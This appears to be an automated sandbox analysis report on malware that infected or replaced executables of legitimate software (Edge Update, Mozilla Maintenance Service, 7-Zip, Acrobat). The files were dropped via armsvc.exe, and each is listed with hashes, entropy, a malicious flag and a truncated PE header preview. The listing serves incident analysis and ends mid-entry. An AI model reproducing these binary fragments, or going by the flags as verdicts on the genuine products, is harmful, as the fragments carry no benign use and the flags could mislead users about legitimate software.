                                                                                                                                                  Entropy (8bit):4.896556576554488
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:zTfcT++foSBWU2YxhkgL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vfcK+foQWU2YnPLLNiXicJFFRGNzj3
                                                                                                                                                  MD5:DD93F24F13C3E6FFA12EF57F3C86556A
                                                                                                                                                  SHA1:34FBC749A57900DAC0D6EB345155538B9FA39557
                                                                                                                                                  SHA-256:F599BBBBF29CE1BE628B5BEBB271A2B18FD5FD989CA759AB8AD4139D8C34A095
                                                                                                                                                  SHA-512:5ED0718437F5A5EF5A5778684DD7B6992C87A3D3AD82095B25B3787F279F549F8619A6D32D87A73E855C66CC4A3862C4F451A60AE8B349C6C21CE194883BE1A4
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@...........................".....J4.......................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1376768
                                                                                                                                                  Entropy (8bit):4.656896633965884
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:YbBRzBgr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:iBRVgrLNiXicJFFRGNzj3
                                                                                                                                                  MD5:A6FA06857C60BD47FB78C9B0F80BF2E1
                                                                                                                                                  SHA1:8D49134AD2EA7E37E3A1E123548E83457E76DE6C
                                                                                                                                                  SHA-256:B4D147BF4F25C3D46A60D5678F834C42EABC8B235D8EF3CF2CF6E50DAAC66FE8
                                                                                                                                                  SHA-512:1413C4ECAACCB7E690BDAA399E9401C68C9B0EED58587DBBCE6C178794A3BE8BD433ABD673493B4BAC96DC46E473BEEB42903FE0D2A3EF8C2A571E0B629D9438
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@........................... .................................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...p...........R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2168832
                                                                                                                                                  Entropy (8bit):7.937635672960778
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:py53w24gQu3TPZ2psFkiSqwozdLNiXicJFFRGNzj3:pyFQgZqsFki+ozd7wRGpj3
                                                                                                                                                  MD5:29345BF3B1387FA912417C3F28E4517F
                                                                                                                                                  SHA1:776023C1A75805631361FEEC3E2C7E43F2AF5801
                                                                                                                                                  SHA-256:2438D7A57B163BBF417D6FE6488ABBCBB491345BBB172FBD85F331BED3BBF675
                                                                                                                                                  SHA-512:342457E5D501C94207ED71F8BCED0BE917CEF1CB4C362691BBAD8104F3ED7F50AF2F3B882736F7133023B2C5FD6B28773412AE243CA210512D4F8955DCC48A3F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.....&k!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3141
                                                                                                                                                  Entropy (8bit):4.83945689994571
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:A83UttJ2lgLf3EQ3U/8acjQjgm4UtqKoJcJQtxRei:zPg
                                                                                                                                                  MD5:E62FF8604D56A86731341337EC8372AA
                                                                                                                                                  SHA1:CA75747C43E7CA75E6E34F1A6E108211524BF316
                                                                                                                                                  SHA-256:89C02AD5D894CF0181112C3B009364B62E5CC756FD917A7925627EFF1B0C175E
                                                                                                                                                  SHA-512:09E8857DCE1FB2BE21C4D1278EB1226ECFFA9ADD606C93D3F55AEE3117A4033802F08AAE5D054EB1562148A0C63F9BC6DE824B0D22124187E9051AE69493FC37
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-10 10:24:17-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-10 10:24:17-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-10 10:24:17-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-10 10:24:1

                                                                                                                                                  C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1512448
                                                                                                                                                  Entropy (8bit):4.897855403674865
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:LQVTZu0Jd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:8VTZusLNiXicJFFRGNzj3
                                                                                                                                                  MD5:680DFBE855D22EE0570837F07CDC45D4
                                                                                                                                                  SHA1:53262356F2BCF33728A454543EEE739A03B1CD0F
                                                                                                                                                  SHA-256:1846E5437B05C28D0D4C911E182CF92DD8560A33EE6165862C7E346EF369548A
                                                                                                                                                  SHA-512:1363BCBA1EED620184BE43EFA2BD3F4B79FEA11CDCD54761EAEB90F8D388DF846C396B29A3AF1907695B84D4853047E17321976FCA5B56465CA59D91FC1BF8F9
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................`"......n.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...`...........t..............@...........................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\7-Zip\7z.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1839616
                                                                                                                                                  Entropy (8bit):5.246005749317532
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:8+gkEdfh4Co2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5gkE5SALNiXicJFFRGNzj3
                                                                                                                                                  MD5:314C1D2294F9EA70912D9DB4387FC797
                                                                                                                                                  SHA1:2ACEB24BAD7397B325450E619EA52AF5E6849302
                                                                                                                                                  SHA-256:59E7A1340382FD49DE3D788E8C35BAAE28248994D6FEABA4994FBD06261BE494
                                                                                                                                                  SHA-512:FE518B6690D9B6C372BED1629CDDFA580240507A84DBD17DCE12FAEDC7B0AAD9F6BBAA1945628F46868CB2307906EB9A7C5D68F1994720AC215699D4A30A3D92
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@..............................0'......I.... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...`...........r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\7-Zip\7zFM.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1532416
                                                                                                                                                  Entropy (8bit):7.089472753375162
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:bBpDRmi78gkPXlyo0Ghjr1/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:tNRmi78gkPX4o0GhjhLNiXicJFFRGNzb
                                                                                                                                                  MD5:027BBAE2D66E3A61C7211DE15C20C02E
                                                                                                                                                  SHA1:954C6A65426475DAE89344B5D882200FEB051B0E
                                                                                                                                                  SHA-256:6CF5C658D3C510C97ACECE7ED8E7AA8F53C1A742054EF539D971CB24A8F0AF4B
                                                                                                                                                  SHA-512:66806CD4A2E0D578E62613D6F4044FAEDA5436434256EC01DB01C0A57458E20141A425D80BCB76B2E142373126D9503AFDA37D0513A6F1DD2EBC4FBD58B29769
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@......................................@.... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\7-Zip\7zG.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1282048
                                                                                                                                                  Entropy (8bit):7.22000048740635
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:ELOS2oPPIXV2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:c/P5LNiXicJFFRGNzj3
                                                                                                                                                  MD5:930237237FDDCFAC3F5B0D9D38550956
                                                                                                                                                  SHA1:AD0225CBE82095495C30E8756CA7BABBB1652CB7
                                                                                                                                                  SHA-256:9EB74D68BE5CB8DDE07C6E3A01DC3FDA38526E20E3468FE3CCB40050B5146C39
                                                                                                                                                  SHA-512:F4671871DCA54BEF0C5F2964B6DE310589AF08AA5BE934EB3F59F67FE877CAD8EFF759762E983A5A63E1190B8ED55A8C2E5117B72280078A73ADAE35C87498FD
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@........................................... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1300992
                                                                                                                                                  Entropy (8bit):4.5288942976894075
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:eYg/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:wLNiXicJFFRGNzj3
                                                                                                                                                  MD5:9DF4954BD75A0ECFFB9817F3874B6BF6
                                                                                                                                                  SHA1:EC34E6A2AC618350659B7679E30204EE73AF127B
                                                                                                                                                  SHA-256:5378EB149719AF99C8104A46FEDE68F24A918AE517F6DF3A571727D04B55442F
                                                                                                                                                  SHA-512:2D029250E377C5D6210C2935242BB54269A1CB77900A99ED75EFBF33FCF6124F979C371DD32BAFDDEF422639AD10F68CDC03C4DED1A2E69879730F105FFE2E03
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@..................................7......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....p...`.......*..............@...........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1222656
                                                                                                                                                  Entropy (8bit):6.698843306440181
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:xtdzn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xtdTLNiXicJFFRGNzj3
                                                                                                                                                  MD5:B8A0F52455AEBEE5620BECE314FEEB17
                                                                                                                                                  SHA1:1356775DDA03E31E20C4068BA4F12633C4868245
                                                                                                                                                  SHA-256:883B2E976AF92B4EEE2754180B9E0132D3760AC54C20917EDDFA214F5A54CCD5
                                                                                                                                                  SHA-512:15B93CBE1B65955BFAACFA56AC76866959BE25A4414F7E81027A089EBABABD0DD1FE60139FA2DBC3D81B75411940FAC581654F7F93260F86D04936E34FD3A8D4
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@...................................._..... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1613312
                                                                                                                                                  Entropy (8bit):4.676581003461684
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:lvfiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:d/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:B2E78EF5436134D816274DF08D6DE63B
                                                                                                                                                  SHA1:528CB5AA9154AFE0EE202B57283FC5336FB17BB6
                                                                                                                                                  SHA-256:689466105E49E18600A29EE51804AB213B6D3EF7077DE37669E02D08765E220B
                                                                                                                                                  SHA-512:1608B8F2DDDB0CE0C7619CDA3BC30589AE469A4C62CE3472D6106C3174CFCA4324CCF51683098DB9B92DE1EA42E7A2D380EC672768343DAB4CA7452F4E5EFC7A
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@..............................#........... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...`...P......................@...................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1616896
                                                                                                                                                  Entropy (8bit):5.04354183114732
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:C5zhM1XSFy/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:YMskLNiXicJFFRGNzj3
                                                                                                                                                  MD5:B2AFA23B7A641C70CA29D8B11124F6E4
                                                                                                                                                  SHA1:3E3A514FB6D9F20C275CF8FF8566D86ECA40337E
                                                                                                                                                  SHA-256:7E571C5C7F047285362B40E4EE1E4119A4497E3D5D01912E1ABA179326DA8F18
                                                                                                                                                  SHA-512:278AE6AF17CF088CFA345FFC7CF74AE5BADAD772CDD072F490B0FB962CA7636F3629E513FF0A840B4777D9E638CFFC5448A5524D6EB47291E47A75BA6252ED14
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@..............................#......P.... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...`...0......................@...........................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):4151808
                                                                                                                                                  Entropy (8bit):6.496760651755457
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:ftuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN7559LNiXico:fjEIa3HIEWOc5T7wRGpj3
                                                                                                                                                  MD5:0F8FC9A358083CAADBBBB7912FEF47C3
                                                                                                                                                  SHA1:74E658B8987111E97CB0CAE3C0F89B76E6F6B54C
                                                                                                                                                  SHA-256:349A7444295676944AA085B97DAA2124AEBE0F6332CE863EFFC4552884A71B42
                                                                                                                                                  SHA-512:4904DC1D88A5A0087FFD52051F6C3D8BB15126EC5C0F4FB2500F862183A9B7020AD2C601AD43C85992675A289E2ED2B9ADD127F1CD7876B1F3645D921C86B448
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):59941376
                                                                                                                                                  Entropy (8bit):7.999353919934817
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1572864:IQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:HXhwMhe6AABPiQwF6xQ22R
                                                                                                                                                  MD5:CC050E1E622C717EA4067C27916E9BE4
                                                                                                                                                  SHA1:8229F591FD4724120D0FEA452246393B07353F51
                                                                                                                                                  SHA-256:46F18420DB74C9EA48DA7D50B7FABCB71AB50CF86DAC5CA3A13F9FD978D5537A
                                                                                                                                                  SHA-512:1CAD01BB05C96E0352E4B26CB8863F38C8FE3AAA14CC7FEE7B3398F9F3957D8AC541D1C5B4A7512515446B07BB7D3DF219089BC4B58724D9B1EFE01BAF672058
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......5..... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1335808
                                                                                                                                                  Entropy (8bit):4.5925875554258395
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:MWCiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:M1/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:D95035800FAB1B23481B34CB0A97B618
                                                                                                                                                  SHA1:AD2331DD9D4272195C19F7493243AD03E62EA73F
                                                                                                                                                  SHA-256:578544DF111182B74B26908B2649243FE3916BBF8A45707F44E71E42577065EC
                                                                                                                                                  SHA-512:5BC1E41E7536034EBB02D964981F96D0B79AF6983DF8967143CFE049D0EE0AC7C5DDD1259586437B33B81E5B105419E714B4BA1F9B2495A5230780382DCF690E
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................P............ .....................................................|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...`..........................@...................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6210048
                                                                                                                                                  Entropy (8bit):6.384603542885844
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:PDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXN:onN9KfxLk6GEQTXsUKzNDY7wRGpj3
                                                                                                                                                  MD5:245F864C7B1DF5D2B18438E9315E5028
                                                                                                                                                  SHA1:275A02A9C7520747786BFB2D8EE7D7864619BD77
                                                                                                                                                  SHA-256:D3BE7F9321C6844DDB487094C650E4068C6C75F961710ACAA0AC39A0756D5997
                                                                                                                                                  SHA-512:9975A6CA45B8E45724A5FC7B83304D297740AE1A15822A51EA7C798EC50E86170B4EDF415A12721A82222BC4CE6234801DC0785F0853E8EFC137302200F73DD7
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._......._... ..........................................<F.|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1312768
                                                                                                                                                  Entropy (8bit):4.543813792275687
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:JoiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Ja/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:BACB1119FAE5E1E1C2C98882EA15F66E
                                                                                                                                                  SHA1:8434302800097EEF4A8BDDAAE2F253D0E5BB94A3
                                                                                                                                                  SHA-256:289BD5061BACBB38FAD4AC6B6B7430ACEEFE62F550B7EF0F995DDA34AA3F3866
                                                                                                                                                  SHA-512:1F7A6B8A21E2FB9E76E6D29E89A2553244FB5C2E4302DC6347797EBF736F5BBAC8529AAB3C916797919C1B5F771FAF439A89E0289F5D25242793A29B052AC916
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:unknown
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.tKx...x...x...q..t.......c.......r.......{.......~...l...}...x...........|.......y...x...y.......y...Richx...................PE..d......d.........."..........>.......0.........@.....................................b.... .................................................lV..........h...........................PI..T....................K..(....I..8............@...............................text....,.......................... ..`.rdata..4"...@...$...2..............@..@.data........p.......V..............@....pdata...............X..............@..@.rsrc...h............\..............@..@.reloc...`...........h..............@...................................................................................................................................................................................................................................................

                                                                                                                                                  C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
